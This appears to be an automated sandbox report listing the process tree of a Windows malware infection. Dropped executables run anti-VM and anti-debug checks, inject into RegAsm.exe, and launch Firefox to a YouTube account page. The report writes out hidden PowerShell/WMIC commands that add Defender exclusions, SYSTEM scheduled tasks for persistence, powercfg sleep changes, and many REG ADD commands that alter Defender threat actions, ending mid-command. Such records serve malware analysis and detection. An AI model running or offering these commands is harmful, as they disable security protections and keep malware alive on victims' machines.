  - - C:\Users\Admin\AppData\Local\Temp\IIEHCFIDHI.exe
      "C:\Users\Admin\AppData\Local\Temp\IIEHCFIDHI.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      PID:4044
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5020
      - C:\Users\Admin\AppData\Local\Temp\1000006001\6b3e4ff372.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\6b3e4ff372.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:3388
      - C:\Users\Admin\AppData\Local\Temp\1000011001\b5ed612d79.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000011001\b5ed612d79.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4472
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2676
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4776
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.0.1576857029\929108393" -parentBuildID 20221007134813 -prefsHandle 1620 -prefMapHandle 1576 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d28e464-edb1-425a-bc8a-765726778704} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 1828 2d9411d5458 gpu
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4948
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.1.1905637708\1709381152" -parentBuildID 20221007134813 -prefsHandle 2188 -prefMapHandle 2184 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31fb95b3-882f-47ee-86e4-6480a73547f9} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 2200 2d936172b58 socket
        9⤵
        
        PID:5096
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.2.536322493\827326347" -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 2920 -prefsLen 21646 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {360394e1-aa9c-49ca-9aee-fe0c7ddd9e43} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 2672 2d9455d3c58 tab
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2136
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.3.365170144\1343574911" -childID 2 -isForBrowser -prefsHandle 3464 -prefMapHandle 3460 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb36c7ea-14d7-42e6-a51d-af4e210d8a49} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 3472 2d9455d3358 tab
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3964
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.4.1156326199\728045666" -childID 3 -isForBrowser -prefsHandle 4768 -prefMapHandle 4780 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {763947da-ce72-4616-8faf-d0e5ce8434e9} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 4776 2d947ca8958 tab
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5772
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.5.1939266885\1698183375" -childID 4 -isForBrowser -prefsHandle 4924 -prefMapHandle 4928 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39202b3e-924e-459f-9110-6c3c1bb84203} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 4916 2d947d62058 tab
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5780
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4776.6.1804647660\745175582" -childID 5 -isForBrowser -prefsHandle 5116 -prefMapHandle 5124 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1316 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45faef36-9401-494e-8fed-82332dae6f4b} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" 5104 2d947d62f58 tab
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GHCAKKEGCA.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3756
- C:\Users\Admin\Documents\SimpleAdobe\kbi1uXnIGQFsMyg7ltTx27kq.exe
  C:\Users\Admin\Documents\SimpleAdobe\kbi1uXnIGQFsMyg7ltTx27kq.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4512
- C:\Users\Admin\Documents\SimpleAdobe\Dod2yc932472MaLNFYX35QpJ.exe
  C:\Users\Admin\Documents\SimpleAdobe\Dod2yc932472MaLNFYX35QpJ.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4032
- C:\Users\Admin\Documents\SimpleAdobe\fOam93AxbRSnB2uTOeOgHu8o.exe
  C:\Users\Admin\Documents\SimpleAdobe\fOam93AxbRSnB2uTOeOgHu8o.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:988
- C:\Users\Admin\Documents\SimpleAdobe\Y2YTSBAzM1gJXcAFXSXzOy7n.exe
  C:\Users\Admin\Documents\SimpleAdobe\Y2YTSBAzM1gJXcAFXSXzOy7n.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:436
- - C:\Users\Admin\AppData\Local\Temp\7zSBD5B.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\7zSCC8D.tmp\Install.exe
      .\Install.exe /LOAdidLLNEO "525403" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:2956
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4272
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1500
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5092
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 00:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCC8D.tmp\Install.exe\" Ij /JtCsdide 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:4120
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 760
        5⤵
        Program crash
        
        PID:4652
- C:\Users\Admin\Documents\SimpleAdobe\EAjBxZtW_w9am5uGGTwXFIds.exe
  C:\Users\Admin\Documents\SimpleAdobe\EAjBxZtW_w9am5uGGTwXFIds.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:408
- - C:\Users\Admin\AppData\Local\Temp\7zSBD1C.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3940
  - - C:\Users\Admin\AppData\Local\Temp\7zSC77C.tmp\Install.exe
      .\Install.exe /wdcUdidEsSsd "385132" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:2988
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4764
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4464
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "beIeSqxTUIgkrqSZzo" /SC once /ST 00:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC77C.tmp\Install.exe\" tg /kWldidQkLR 385132 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:2608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 1028
        5⤵
        Program crash
        
        PID:5408
- C:\Users\Admin\Documents\SimpleAdobe\dBU5daKKnuglFey9yEfpQCyy.exe
  C:\Users\Admin\Documents\SimpleAdobe\dBU5daKKnuglFey9yEfpQCyy.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1292
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3036

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2528

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4008

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3036
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4032
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4704
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1516
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1512
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1180
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1836

C:\Users\Admin\AppData\Local\Temp\7zSCC8D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC8D.tmp\Install.exe Ij /JtCsdide 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1932
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2444
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2432
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:60
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 